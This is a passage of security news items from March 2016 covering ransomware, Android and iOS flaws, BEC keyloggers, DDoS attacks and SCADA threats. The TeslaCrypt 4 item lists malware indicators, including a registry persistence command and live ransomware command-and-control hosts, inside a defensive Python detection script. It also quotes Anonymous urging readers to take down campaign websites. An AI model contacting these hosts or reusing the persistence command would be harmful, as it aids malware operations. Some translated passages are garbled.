Lars Findsen, the head of PET, is confident that Government experts could support the growth of talented nerds.
“This is not about fully-capable hackers – hopefully, there are not many of those out there, anyways – but about people who have the basic skills we can build on,” Findsen told Politiken.
The Danish hacker academy provides a training program that includes three modules spread across four and a half months.
The first one is a basic module on network and computer security, the second one is a module on defensive hacking, and the training closes by teaching offensive hacking techniques to the participants.
The Danish hacker academy will be located in Copenhagen, but its exact location is still a mystery. All participants who successfully complete the training will be enrolled in PET’s Computer Network Exploitation team. But beware: only a privileged few will be selected annually.
“The selection process will be supervised by psychologists and PET’s own IT specialists and is based on the same recruitment process used for the elite commando frogman corps of the Royal Danish Navy.” states a post published by the PET online.
“Officially termed ‘network retrieval‘, in reality the recruits would be helping PET with cyber espionage against foreign powers, writes Politiken – a type of activity that would normally get you sent to prison.“
The experts at PET have no doubt: the Danish hacker academy will produce highly skilled hackers who will form a new cyber army operating abroad and inside the country.
Metaphor – a new threat for Android users
21.3.2016 Viruses
Another problem with Android’s multimedia library may threaten tens of millions of users.
Stagefright is a risk again. Millions of Android devices are again under threat after a new way was discovered to exploit a hole in the multimedia library that Google has already patched in the past.
The Israeli security company NorthBit named the weakness Metaphor and says that all devices running Android 2.2, through 4.0, up to 5.0 and 5.1 are vulnerable. Most of all Nexus 5 smartphones with the stock ROM and, with certain modifications, also the HTC One, LG G3 and Samsung S5.
It is a bug similar to the one designated CVE-2015-3864, which was first discovered early last year by the security company Zimperium. Google has already fixed it twice, the second time doing so relatively quietly given the possible threat.
According to Zuk Avraham, the founder of Zimperium, the current report from colleagues at NorthBit therefore represents a considerable risk, since hackers can exploit it more easily. Especially after NorthBit published a video of the successful exploitation of the security bug.
An unsuspecting user only needs to click on a malicious link and stay on the web page for a while – the company states from a few seconds up to two minutes – before the malicious code does its work. On devices with Android 5.0 and 5.1 it can even defeat ASLR, the measure intended to prevent such attacks.
According to NorthBit’s estimates, Android 5.0 and 5.1 currently run on roughly 235 million devices, and Android 2.x without ASLR on 40 million devices. “It is hard to estimate how many of them are actually at risk,” it writes in its report.
Last August, under the influence of the Stagefright threat, Google promised more regular patch releases and closer cooperation with mobile device manufacturers, and although the patches do not arrive as regularly as some users would expect, it can be assumed that Google will respond promptly to the current problem.
“For the Android community, patching bugs like these is a particularly big challenge. Developers and manufacturers are under great pressure to fix such bugs quickly,” says Chris Eng, vice president at Veracode.
New Trojan horse terrorizes iPhone and iPad users
21.3.2016 Viruses
Computer pirates have recently been targeting Apple users more and more often. In the past weeks the KeRanger ransomware plagued users of the operating system; now the AceDeceiver Trojan is targeting smartphones and tablets bearing the bitten-apple logo. The Hot for Security site drew attention to it.
The new malicious code was discovered by researchers at Palo Alto Networks. According to them, incidentally, it is the very first Trojan horse for the iOS platform, i.e. Apple’s mobile operating system.
Security experts point out that the uninvited guest can spread even to devices on which no jailbreak has been performed. A jailbreak is essentially the unlocking of a smartphone or tablet so that applications can be installed on it from unofficial sources as well.
That is precisely how malicious code has most often spread on iPhones and iPads. The AceDeceiver Trojan, however, does not need a jailbreak; to repeat, it can spread even on non-jailbroken devices.
A backdoor into the system
Once inside, it can cause quite a lot of mischief. It opens a backdoor into the system for cybercriminals, giving them access not only to settings but also to user data.
So how does the pest get into a phone or tablet? The computer pirates rely on users wanting to download applications not only via their mobile phone but also via a Windows computer, to which the iPhone or iPad is simply connected through the iTunes application.
According to the Palo Alto Networks researchers, AceDeceiver has been spreading since the middle of last year, but was only discovered now. The researchers currently have three programs that contain this pest and were offered through the official App Store.
Security experts alerted Apple representatives to the dangerous applications before the whole affair was made public. The infected programs can therefore no longer be downloaded.
The question remains, however, whether the researchers managed to uncover all the infected applications, or whether some are still lurking for users in the App Store.
Extortionists target Mac OS X
At the beginning of March the computer pirates also targeted owners of computers running Mac OS X. Users could infect their machines with the KeRanger virus if they installed the Transmission torrent client on them. That is where the uninvited guest was hiding.
For the first three days the victims of the ransomware probably did not even notice that something was wrong. It stayed hidden in the background and waited for its opportunity. Only after the mentioned 72 hours did it activate and start wreaking havoc in Mac OS X.
Just as on the Windows platform, it encrypts the data stored on the hard disk. The attackers then demand a ransom of 10,000 Czech crowns to make it accessible again.
Hacking Tesla Model S, too much noise around a great research
21.3.2016 Hacking
Last week at the CeBIT the Lookout’s Co-Founder and CTO Kevin Mahaffey talked about hacking Tesla Model S providing indications on possible countermeasures.
Last week at the CeBIT conference held in Hanover, Lookout’s Co-Founder and CTO Kevin Mahaffey talked about hacking the Tesla Model S, providing indications on possible countermeasures. Unfortunately, many security professionals highlighted that Mahaffey had forgotten to mention half of his team, making it look as if he was taking the credit for himself.
This type of work by researchers should be seen as “doing the world a service”: researchers are making cars more secure. Of course they are hacking them, but they are also finding solutions to the problems.
Tesla, besides making great cars, also has great policies that ensure car security is a high priority for the company; for this reason, it encourages the hacker community to hack its vehicles and disclose the vulnerabilities they find.
The reason Kevin Mahaffey and Marc Rogers focused on hacking Tesla models is that the company is building a new model from scratch, and this type of car will be common everywhere in the near future.
Even if everything done by Kevin and his team looks easy, it took them many years of research to get to the point, shown in the presentation, where they can “control” the Model S.
Last year Kevin and Marc gave a presentation at the DEF CON conference; the findings of their research helped Tesla discover problems in its cars and contributed to improving the image of the company, which is perceived by experts as research-friendly.
Coming back to the CeBIT presentation on hacking Tesla, many people took the title “Why I Hacked the Tesla Model S” and focused on the “I” part, making it look as if Kevin Mahaffey was claiming all the credit for himself.
CSO tried to reach Marc Rogers to talk about this problem, but Rogers declined to comment. No one at Lookout was aware of any problem related to the presentation or presentation title, and when the issue came to their attention, they blamed CeBIT.
In an e-mail a spokesperson of Lookout said:
“disappointing that CeBIT positioned Kevin and Marc’s research in such a way that excluded recognition of Marc’s extremely hard work.”
“It was absolutely a collaboration between the two of them and Kevin does make that clear in his CeBIT presentation,”
And if you watch that presentation you know it’s true; at a certain point Kevin says:
“Why did I undertake this research? It was myself Kevin Mahaffey and my research partner Marc Rogers, we’ve been working on this project for several years…”
In addition, Kevin showed a photo of Marc during the process of stopping the Model S.
In another e-mail exchange with CSO, Kevin says he offered an apology and stated that he feels terrible that Rogers would feel slighted by the incident.
Lookout says they were “caught the misleading title, and apologize failing to do so.” and has already asked CeBIT to correct the article/presentation.
I suggest watching the interesting presentation given at the CeBIT conference.
An iOS zero-day allows iCloud photos and videos decryption
21.3.2016 iOS
A group of researchers found an iOS zero-day that would let a skilled attacker decrypt photos and videos that were sent as secure instant messages.
The bad news is that Matthew Green, a professor at Johns Hopkins University, revealed that a zero-day vulnerability in iOS encryption allows skilled attackers to decrypt intercepted iMessages. The good news is that the flaw is very hard to exploit.
Green explains that he suspected the flaw when reading Apple documentation related to the encryption scheme implemented in its messaging system.
The popular expert Matthew Green hasn’t provided the details of the exploit, to give Apple the opportunity to fix it. The expert also added that the flaw would not have helped the US government in the case of the San Bernardino shooter’s iPhone.
The hacking technique could be used by law enforcement only to access photos and videos sent by suspects using iMessage.
“This specific flaw in Apple’s iMessage platform likely would not have helped the FBI pull data from an iPhone recovered in December’s San Bernardino, Calif., terrorist attack, but it shatters the notion that strong commercial encryption has left no opening for law enforcement and hackers, said Matthew D. Green, a computer science professor at Johns Hopkins University who led the research team.” states The Washington Post that interviewed Green.
“Even Apple, with all their skills — and they have terrific cryptographers — wasn’t able to quite get this right,” said Green.“So it scares me that we’re having this conversation about adding back doors to encryption when we can’t even get basic encryption right.”
Green explained that, with the support of his group of experts (Ian Miers, Christina Garman, Gabriel Kaptchuk, and Michael Rushanan), he could guess the key used to decrypt photos and videos stored in iCloud.
The team of researchers wrote an application that emulated an Apple server and then targeted an encrypted photo stored on the iCloud. The software sent key digit guesses to an iPhone running an old version of iOS, which in turn indicated when each key of its 64 digits was correct.
Green highlighted that this attack technique could be very dangerous if conducted by a persistent attacker, such as a nation-state actor.
The iOS 9.3 beta version seems to be unaffected and will be released as stable shortly.
Apple partially fixed the zero-day vulnerability with the iOS 9 release.
Hackers brought down the websites of principal Swedish Newspapers
21.3.2016 Hacking
The online editions of principal Swedish newspapers were knocked out for several hours by a cyber attack during the weekend.
The websites of several Swedish newspapers were shut down over the weekend due to an “extremely dangerous and serious” cyber attack.
The websites hit by the hackers are those of Dagens Nyheter, Svenska Dagbladet, Expressen, Aftonbladet, Dagens Industri, Sydsvenskan and Helsingborgs Dagblad. The websites went down on Saturday evening from about 19:00 GMT until about 22:00 GMT.
The news was confirmed by the head of the Swedish Media Publishers’ Association, Jeanette Gustafsdotter, in an interview with the Swedish news agency TT.
“To threaten access to news coverage is a threat to democracy,” she said.
At the time of writing, no one had claimed responsibility for the cyber attack and there were no details about it. Experts speculate that threat actors coordinated distributed denial-of-service (DDoS) attacks against the websites of the Swedish media outlets.
Immediately before the attacks a Twitter account posted the following messages:
“The following days attacks against the Swedish government and media spreading false propaganda will be targeted” tweeted @_notJ.
“This is what happens when you spread false propaganda. Aftonbladet.se #offline @Aftonbladet” states another Tweet.
The Swedish Police and intelligence services are investigating the case. According to several sources on the Internet, the attacks originated from Russia.
Olympic Vision BEC attacks target businesses worldwide with keyloggers
20.3.2016 Crime
Trend Micro discovered a Business Email Compromise campaign leveraging the Olympic Vision keylogger and targeting companies in the Middle East and Asia Pacific.
A new malware-based campaign is targeting key employees of companies in the US, Middle East and Asia. The attackers are using malware in a classic business email compromise (BEC) attack in order to hijack the email accounts of the victims and authorize financial transactions on their behalf.
The attacks have been traced back to Lagos and Kuala Lumpur.
“The Business Email Compromise (BEC) is a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that regularly perform wire transfer payments. Formerly known as the Man-in-the-E-mail Scam, the BEC was renamed to focus on the “business angle” of this scam and to avoid confusion with another unrelated scam.” reports the statement issued in 2015 by Internet Crime Complaint Center (IC3) and the FBI.
In this latest wave of attacks, uncovered by experts at antivirus firm Trend Micro, hackers attempted to gain control of victims’ accounts to trick other employees, suppliers or business partners into making wire transfer payments to accounts controlled by the crooks.
The cyber criminals targeted key employees at companies from 18 countries by spreading a commercial keylogger named Olympic Vision. The attackers sent the victims malicious emails masquerading as messages from business partners, purporting to provide information about alleged problems with a recent bank transfer or invoice.
“Olympic Vision is a keylogger malware involved in an ongoing Business Email Compromise (BEC) campaign targeting 18 companies in the US, Middle East and Asia, the majority of which coming from the two latter regions (22%, 39% and 39% respectively). Business Email Compromise attacks involve spear phishing/social engineering techniques to infect key employees’ systems with info-stealing malware and intrude upon business dealings/transactions. ” states a report published by Trend Micro.
The researchers explained that the Olympic Vision keylogger is very cheap (it is available on the black market for $25), but the experts highlight that it isn’t a very advanced threat.
“Olympic Vision is the fourth malware we’ve seen used in Business Email Compromise campaigns, after Predator Pain, Limitless, and HawkEye. Similar to other BEC malware, Olympic Vision is capable of stealing a variety of information from its target, and comes with a small price tag – its toolkit can be bought for $25. ” Trend Micro wrote in a blog post.
“Olympic Vision is not advanced by any means. Like Predator Pain and Limitless, keyloggers that have been used for the very same purpose in previous BEC campaigns, it performs its main function – that is, to log keystrokes and take screenshots for the purpose of stealing personal information – well and without unneeded complexity.” continues the report.
Once installed on the victim’s machine, Olympic Vision collects information about the system configuration, login credentials saved in several applications (i.e. email clients, browsers, FTP programs and instant messaging applications) and keystrokes. The malware also gathers network information and images and text from the clipboard.
Although the threat is not particularly advanced, it is well suited to collecting the information attackers use to understand the accounting workflows of the targeted firms.
“We looked at the trail of Olympic Vision keyloggers being used in the wild to check for organized activity, and were able to trace the identities of the actors, and positively identified two Nigerian cybercriminals — one operating from Lagos, and the other from Kuala Lumpur,” continues the blog post.
Business Email Compromise is a serious threat to businesses, causing losses of a thousand million dollars every year.
Redaction error reveals Feds ordered Lavabit to spy on Snowden
20.3.2016 Security
A redaction error in court-ordered release of the Lavabit case files confirmed that Edward Snowden was the target of the FBI.
Lavabit was an encrypted webmail service founded in 2004 by Ladar Levison. It closed on August 8, 2013, after the US authorities ordered it to turn over its Secure Sockets Layer (SSL) private keys to enable government surveillance activities. The US Government was interested in spying on Edward Snowden‘s emails.
Now a redaction error in the court-ordered release of the Lavabit case files has confirmed that Edward Snowden was the target of the FBI investigation that caused the termination of the secure email service.
We now have certainty that Snowden was using the Lavabit email service and that the FBI drove the company into closure because it refused to comply with the US Government’s requests.
The US Government ordered Lavabit to install a surveillance implant on its servers and later to turn over Lavabit’s encryption keys, allowing the Feds to access Snowden’s messages. The court order also required the company not to disclose the surveillance activity to third parties.
After a few weeks of legal dispute, Levison shuttered Lavabit, refusing to become complicit in criminal surveillance operated by the US Government.
“After 38 days of legal fighting, a court appearance, subpoena, appeals and being found in contempt of court, Levison abruptly shuttered Lavabit citing government interference and stating that he would not become “complicit in crimes against the American people”.” reported the Guardian.
US authorities recently revealed the mysterious circumstances behind the Lavabit shutdown by publishing a collection of case files that were not correctly redacted, revealing the target of the FBI activity: the email address Ed_Snowden@lavabit.com.
The document was published in full by Cryptome; Snowden’s email address is visibly left unredacted.
The documents were publicly disclosed as a result of Levison’s battle against the US Government: he filed a motion in December that prompted the court to order the release of files related to the Lavabit case.
The Lavabit founder plans to reveal what really happened, but he is still under an order not to disclose the facts … meanwhile, the redaction error leaves no doubt about the real intent of the FBI in the Lavabit case.
TeslaCrypt 3.0.1 ransomware takes extortion further; it can no longer be broken
20.3.2016 Viruses
Today, Milan Šurkala, news item. Extortion malware is on the rise, becoming a much more frequent threat than in the past. The new version TeslaCrypt 3.0.1 fixes the bugs of the previous variant, and it will now be impossible to get at the original data without paying the ransom.
In recent months and years we have seen a significant rise in ransomware, extortion software that encrypts all the data on the victim’s disk and demands a ransom to unlock it. TeslaCrypt is one of the most insidious, and its new version 3.0.1 has fixed the bugs of the previous ones. According to security experts, the encryption is so strong that it cannot be broken by any method (brute force is unthinkable due to the time required).
Previous versions of the software kept the unlocking key on the victim’s computer, and several applications appeared that could unlock the encrypted data (TeslaCrack, TeslaDecrypt, TeslaDecoder). The new version creates an encryption key that is unique for each computer, encrypts the data with it, but then sends it to the attacker’s server and deletes it from the affected computer. Then there is nothing left but to pay, and there is no guarantee that the attackers will actually decrypt your data. The situation is even worse because ransomware often slips past antivirus programs. You therefore have to be careful with e-mail attachments, and it is also ideal to keep backups of important data.
Security Researcher Who Investigated Bangladesh Bank Hack Goes Missing
20.3.2016 Hacking
Tanvir Hassan Zoha, a 34-year-old security researcher, who spoke to media on the $81 Million Bangladesh Bank cyber theft, has gone missing since Wednesday night, just days after accusing Bangladesh's central bank officials of negligence.
Zoha was investigating a recent cyber attack on Bangladesh's central bank that let hackers steal $81 Million from the bank's Federal Reserve account.
Though the hackers tried to steal $1 Billion from the bank, a simple typo prevented the full heist.
During his investigation, Zoha came to believe that the hackers, who are still unknown, had installed malware on the bank's computer systems a few weeks before the heist, which allowed them to obtain the credentials needed for payment transfers.
With the help of those credentials, the unknown hackers transferred large sums from Bangladesh's United States account to fraudulent accounts based in the Philippines and Sri Lanka.
However, at the same time, Zoha accused senior officials at Bangladesh central bank of gross negligence and weak security procedures that eventually facilitated the largest bank heist in the country.
The central bank's governor Atiur Rahman, along with two of his deputy governors, had to quit their jobs over the scandal, hugely embarrassing the government and raising alarm over the security of Bangladesh's foreign exchange reserves of over US$27 Billion.
However, when the investigation was still going on, Zoha disappeared Wednesday night, while coming home with one of his friends, according to sources close to Zoha's family.
While speaking to media in the wake of the massive cyber attack, Zoha identified himself as the ICT (Information and Communication Technology) Division's cyber security expert who had worked with various government agencies in the past.
Soon after Zoha's disappearance, the government officials put out a statement but did not provide more details besides the fact that they opened an investigation.
Zoha's family members suspect that the comments Zoha made about the carelessness of bank’s officials on the Bank heist to the press on March 11 are the cause of his disappearance.
Hackers stole data from the Swiss People’s Party
20.3.2016 Hacking
The Swiss People’s Party confirmed that they have been the target of hackers who have stolen the personal data of over 50,000 individuals.
A group of hackers that calls itself NSHC claims to have hacked Switzerland's largest party, the conservative Swiss People's Party (SVP), and stolen the personal data of over 50,000 individuals.
The cracked archive includes the names and email addresses of Swiss People’s Party supporters.
The NSHC say they hacked the Swiss People's Party to raise awareness of Switzerland's lack of protection against cyber attacks.
Representatives of the Swiss People’s Party confirmed to 20 Minuten daily that the systems of the party were hit by a cyber attack but.
“Apparently it’s hackers succeeded in the database of svp.ch penetrate and gain access to various data, including e-mail addresses. A group that calls itself NSHC and understood as ‘Grey Hats’ has, the editors received from inside-channels.ch she wanted to show the attack, that Switzerland is not sufficiently protected against cyber attacks.” reported the website inside-it.ch.
According to the inside-it.ch website, the NSHC hacker group also launched DDoS attacks against several Swiss online shops and the Swiss Federal Railways (SBB) website this week.
“The Swiss Federal Railways website was hard to access on Monday afternoon for about an hour and in the evening for around one and a half hours due to a DDoS attack,” Swiss Federal Railways spokesman Daniele Pallecchi told the Swiss news agency.
According to Pascal Lamia, the head of the government’s Reporting and Analysis Center for Information Assurance (also known as MELANI), the attack on the Swiss People’s Party is not linked with cyber attacks recently observed against small enterprises and online shops.
“There is no connection with the chopped SVP sites including the DDoS attacks on web shops,” said Lamia.
The experts at MELANI confirmed that they have no information about the NSHC group.
MELANI suggests that people and businesses check whether their email addresses have been hacked through an online tool available at https://www.checktool.ch.
Bored With Chess? Here's How To Play Basketball in Facebook Messenger
19.3.2016 Safety
Hope all of you have enjoyed the Game of Chess in the Facebook Messenger.
But if you're quite bored playing Chess or not really good at the game, then you probably felt a bit excited about Facebook's recent inclusion of a little Basketball mini-game into Messenger.
Now you can play Basketball through Facebook Messenger, just by typing in the Basketball emoji and sending to one of your friends. This would enable a secret Basketball mini-game between you and your friend.
Here's How to Play Basketball:
Just locate the basketball emoji from your emoji list, send to one of your friends and click it to start the game.
Once sent, you are taken to a basketball court on a pure white background, with no sidebars, friend suggestions or promotional ads; only a basketball and a hoop appear, nothing else!
All you have to do:
Just Swipe up and Toss the basketball into the hoop.
A single swipe on your phone in the direction of the hoop sinks the ball. Facebook also encourages your gameplay with various emojis after each basket.
On a successful basket, the game appreciates your gameplay by displaying emojis like Thumbs Up, Hands Up, Claps and Smiles. On a miss, the game warns you with emojis like "Surprised", "Feared" and similar.
Messenger will also display your scores in between, based on your successful baskets. Your goal is to challenge your friend to see who can get the most consecutive baskets.
Video Demonstration
You can watch the Video Demonstration of Facebook Hidden Basketball game below:
To play this game, the Facebook users should have the latest version of Messenger installed on their mobile phone.
The addition of such mini-games into Facebook's messaging platform would be a loneliness breaker.
As this game had been unveiled after a couple of weeks of Chess, let's hope Facebook would integrate more games like caroms or snooker in its upcoming rollouts.
Anonymous claims to leak Trump ’s personal info under #OpWhiteRose
19.3.2016 Hacking
The Anonymous Hacker collective claims to publish Donald Trump’s personal information, including Social Security Number and addresses.
Alleged members of the Anonymous collective have leaked Donald Trump’s already public “private” phone numbers and other information online. The hackers also leaked addresses, including that of the Palm Beach residence in Florida, and a social security number as part of the anti-Trump operation dubbed #OpWhiteRose.
Anonymous called the new campaign #OpWhiteRose, after a non-violent resistance group in Nazi Germany.
Rumors online confirm that members of Anonymous have dumped Trump’s sensitive information, including detailed information about Trump’s personal agent (Tracy Brennan) and legal representatives (Manatt Phelps & Phillips), whose phone numbers have now “gained publicity.”
“These are provided for informational purposes only,” states an Anonymous spokesman in a video published by the collective. “… That might be able to assist you all in independently investigating this would-be dictator.”
Analyzing the leaked data, it is possible to note that the released information was already publicly available; Trump’s private phone number was shared by the presidential candidate himself in August on Twitter.
This week, Anonymous declared total war on Trump and his campaign; the hacker collective plans to coordinate a series of attacks on Trump’s web sites starting April 1, April Fool’s Day.
“We have been watching you for a long time and what we’ve seen is deeply disturbing. You don’t stand for anything but your personal greed and power.”
“This is a call to arms. Shut down his websites, research and expose what he doesn’t want the public to know. We need you to dismantle his campaign and sabotage his brand.”
“We need to dismantle his campaign and sabotage his brand,” said the Anonymous spokesman.
A few weeks ago, alleged members of the Anonymous group hacked Donald Trump‘s voicemail. Journalists at Gawker received an email from the hackers containing recordings from Donald Trump‘s voicemail inbox.
The hacktivist group first threatened Trump with war in December, when he said he would look to ban all Muslims from entering the United States.
The data were published on Pastebit.
Apple Engineers say they may Quit if ordered to Unlock iPhone by FBI
19.3.2016 Apple
The Apple vs. FBI battle over mobile encryption is taking more twists and turns with every passing day.
On one hand, the US Department of Justice (DOJ) is boldly warning Apple that it might compel the company to hand over the source code of its full iOS operating system along with the private electronic signature needed to run a modified iOS version on an iPhone, if…
…Apple does not help the Federal Bureau of Investigation (FBI) unlock iPhone 5C belonging to one of the San Bernardino terrorists.
And on the other hand, Apple CEO Tim Cook is clear on his part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
Now, some Apple engineers who actually develop the iPhone encryption technology could refuse to help the law enforcement break security measures on iPhone, even if Apple as a company decides to cooperate with the FBI.
Must Read: FBI Director – What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?
Apple Employees to Quit their Jobs
Citing more than a half-dozen current and former Apple engineers, The New York Times report claims that the engineers may refuse the work or even "quit their jobs" if a court order compels them to create a backdoor for the very software they once worked to secure.
"Apple employees are already discussing what they will do if ordered to help law enforcement authorities," reads the report. "Some say they may balk at the work, while others may even quit their high-paying jobs rather than undermine the security of the software they have already created."
Apple previously said that building a new backdoored version of iOS to satisfy the FBI's demand would require up to a month of work and a team of 6-10 engineers, naturally Apple's top software engineers.
Also Read: Apple is working on New iPhone Even It Can't Hack.
However, Apple employees said they already have "a good idea who those employees would be." They include:
A former aerospace engineer who developed software for the iPhone, iPad and Apple TV.
A senior quality-assurance engineer who is an expert "bug catcher" with experience in testing Apple products.
An employee who specializes in security architecture for the operating systems powering Apple products including iPhone, Mac and Apple TV.
The FBI wants Apple's assistance to help the authorities bypass the security mechanisms on San Bernardino shooter Syed Farook's iPhone 5C so that they can extract data from the phone.
Given that the San Bernardino case is currently working its way through the courts and that no one is prepared to stand down, the possibility that Apple might have to comply with the orders is probably years away.
Be aware the unbreakable TeslaCrypt 4 was detected in the wild
19.3.2016 Virus
According to the experts at the security firm Heimdal Security, the ransomware TeslaCrypt 4 has arrived and is infecting systems in the wild.
According to the experts at Heimdal Security, the fourth version of the infamous TeslaCrypt ransomware has just been launched. TeslaCrypt 4 implements new functionality and is more stable than previous versions; it also fixes various bugs, including one related to the encryption of large data files. In the previous variants, files larger than 4 GB would get permanently damaged when the ransomware tried to encrypt them.
TeslaCrypt 4 uses RSA-4096 for data encryption, which makes it impossible to recover the data encrypted by the ransomware.
“Consequently, the encrypted data will be impossible to recover, which can determine information loss if the victim doesn’t have a backup for the affected data.” states a report published by Heimdal Security.
The bad news for the victims is that the TeslaDecoder tool used to rescue files encrypted by previous variants of the ransomware no longer works with TeslaCrypt 4.0.
Victims of the TeslaCrypt 4 ransomware have no way to recover their information; they can only restore files from a previous backup or pay the ransom, with no guarantee of success.
Researchers spotted TeslaCrypt 4 in the wild; crooks use drive-by attacks to spread the ransomware, leveraging the Angler exploit kit.
The researchers have already blocked more than 600 domains hosting the Angler EK in just one day. It has been estimated that the daily average number of Angler EK domains blocked by the security firm will soon reach 1,200 per day.
TeslaCrypt 4 can also be used by attackers to harvest users’ data, including the “MachineGuid”, “DigitalProductID” and “SystemBiosDate” values.
Experts at Heimdal Security have published the following Indicators of Compromise for the Teslacrypt 4.0:
%UserProfile%\Desktop\RECOVER[%5 random signs%].html
%UserProfile%\Desktop\RECOVER[%5 random signs%].png
%UserProfile%\Desktop\RECOVER[%5 random signs%].txt
%UserProfile%\Documents\[random file name].exe
%UserProfile%\Documents\recover_file.txt
TeslaCrypt 4 also creates the following value in the registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\_[random name] C:\Windows\SYSTEM32\CMD.EXE /C START %user account%\Documents\[random name].exe
The current list of TeslaCrypt 4 Command & Control servers is the following:
http://commonsenseprotection[.]com/phsys.php
http://ebookstoreforyou[.]com/phsys.php
http://esbook[.]com/phsys.php
http://exaltation[.]info/plugins/phsys.php
http://hmgame[.]net/phsys.php
http://shampooherbal[.]com/phsys.php
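The indicators above are most useful when turned into checks that can be run over host and proxy data. The following Python script is an added example written for this article, not code from Heimdal Security: it encodes the dropped-file names, the Run persistence value and the C2 hosts listed above as matchers and runs them over constructed sample file paths, Run values and proxy log lines. The alphanumeric interpretation of "5 random signs", the proxy log layout (timestamp, client IP, method, URL, status) and all sample data are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Hosts of the C2 URLs from the report, with the "[.]" defanging removed so they
# can be compared against real log data; every listed URL ends in phsys.php.
C2_HOSTS = {
    "commonsenseprotection.com", "ebookstoreforyou.com", "esbook.com",
    "exaltation.info", "hmgame.net", "shampooherbal.com",
}
C2_PATH = "phsys.php"

# Ransom notes dropped on the desktop: RECOVER plus five random characters.
# The report does not say what the "random signs" are; alphanumerics are assumed.
RANSOM_NOTE_RE = re.compile(
    r"\\Desktop\\RECOVER[A-Za-z0-9]{5}\.(?:html|png|txt)$", re.IGNORECASE)
RECOVER_FILE_RE = re.compile(r"\\Documents\\recover_file\.txt$", re.IGNORECASE)

# Persistence: a Run value named "_<random>" whose data uses cmd.exe to start
# an executable from the user's Documents folder.
RUN_VALUE_PREFIX = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\_"
RUN_DATA_RE = re.compile(
    r"^C:\\Windows\\SYSTEM32\\CMD\.EXE /C START .+\\Documents\\[^\\]+\.exe$",
    re.IGNORECASE)


def match_files(paths: List[str]) -> List[str]:
    """Return the paths that look like TeslaCrypt 4 file artefacts."""
    return [p for p in paths if RANSOM_NOTE_RE.search(p) or RECOVER_FILE_RE.search(p)]


def match_run_values(values: Dict[str, str]) -> List[str]:
    """Return the names of Run values matching the reported persistence entry.
    `values` maps the full value name to its data."""
    return [
        name for name, data in values.items()
        if name.lower().startswith(RUN_VALUE_PREFIX.lower()) and RUN_DATA_RE.match(data)
    ]


def match_proxy_log(log_text: str) -> List[dict]:
    """Flag proxy log lines whose URL host is a known C2 host.
    Lines are assumed to be 'timestamp client_ip method url status';
    a full-path match (phsys.php) is reported as higher confidence."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        parsed = urlparse(fields[3])
        host = (parsed.hostname or "").lower()
        if host in C2_HOSTS:
            hits.append({
                "client": fields[1],
                "url": fields[3],
                "exact": parsed.path.endswith("/" + C2_PATH),
            })
    return hits


# Constructed sample data (not real telemetry).
SAMPLE_FILES = [
    r"C:\Users\alice\Desktop\RECOVERab3k9.html",
    r"C:\Users\alice\Desktop\RECOVERab3k9.png",
    r"C:\Users\alice\Desktop\RECOVERab3k9.txt",
    r"C:\Users\alice\Documents\recover_file.txt",
    r"C:\Users\alice\Desktop\RECOVERY.txt",      # benign: not five random characters
    r"C:\Users\alice\Documents\report.docx",     # benign
]
SAMPLE_RUN_VALUES = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\_qz7pl":
        r"C:\Windows\SYSTEM32\CMD.EXE /C START C:\Users\alice\Documents\qz7pl.exe",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive":
        r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
SAMPLE_PROXY_LOG = """\
2016-03-18T10:00:01Z 10.0.0.5 GET http://hmgame.net/phsys.php 200
2016-03-18T10:00:02Z 10.0.0.5 GET http://www.example.com/index.html 200
2016-03-18T10:00:03Z 10.0.0.7 POST http://exaltation.info/plugins/phsys.php 200
2016-03-18T10:00:04Z 10.0.0.9 GET http://esbook.com/about.html 404
"""

if __name__ == "__main__":
    print("file hits:", match_files(SAMPLE_FILES))
    print("run value hits:", match_run_values(SAMPLE_RUN_VALUES))
    for hit in match_proxy_log(SAMPLE_PROXY_LOG):
        print("proxy hit:", hit)
```

A host-only match (the last sample line) is still worth triage: the listed domains were registered for the campaign, so any contact with them from inside the network deserves a look, even without the phsys.php path.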
This new variant of TeslaCrypt demonstrates the rapid evolution of a threat that first appeared in March 2015; version 2.0 appeared in the wild in July 2015 and TeslaCrypt 3.0 in January 2016.
SCADA hacking – Hackers with ability to cut the power is a real threat
19.3.2016 Hacking
The Ukrainian power blackout has demonstrated the worrying effects of SCADA hacking; other countries like the UK fear similar attacks.
All the warnings from security experts throughout the years have unfortunately been disregarded when it comes to hackers’ threats to strategic sites, such as power generation.
As a result, hackers have acted according to their own agenda and have taken the world by storm. On 23 December 2015, Ukraine suffered a large-scale power blackout that caused great distress to the people. Prykarpattyaoblenergo lost more than 30 substations, causing havoc. And the most frustrating thing of all: the power stations have not yet been completely fixed. The reason is that the malware used by the hackers in the Ukrainian power outage erased key files.
What does this say about security online?
The malware used is called “KillDisk” and was the outcome of a well-organized effort to gain control over the power company's computers. Files reached the people working for the power company as attachments that appeared to come from their “friends”, making it easier to get them opened. Instead of files sent by their friends, the malware was installed on the computers and caused all these grave consequences.
On the bright side, this must have taken a lot of time, and therefore it is not the main tactic used by hackers in similar cases. However, it could always happen again!
The bad news is that there are alternative ways for hackers to get inside similar systems, according to Sergey Gordeychik, who helps with Scada Strangelove, the community of experts working on discovering the faults of ICS systems.
“We can discover more than 80,000 different kinds of ICS systems connected to the internet directly,” Gordeychik told the BBC.
As a result, ICS systems are unable to defend themselves against an attack. This is really frustrating, as there are ways to enhance their security and avoid these phenomena. The purpose of Scada Strangelove, according to Mr. Gordeychik, is to change that:
“The main idea is to raise awareness and to force vendors to create more secure-by-design systems.”
UK infrastructure is being scrutinized by Crest these days in an effort to identify such potential threats. According to Ian Glover from Crest:
“The single biggest vulnerability is connecting poorly protected corporate IT to operational technologies,” and so this is where they have focused. “It’s much easier to exploit the corporate IT because there are so many tools you can download and use to do that.”
Of course, the aim of every security researcher out there in the UK is to enhance online security and raise awareness of such a threatening phenomenon, one that could blow up the structure of a whole country within minutes. Although there are reasonable grounds for worrying about what can happen in the case of SCADA hacking, proper capability and intent can lead to a sufficient defense against hacking threats for the UK and the world – hopefully!
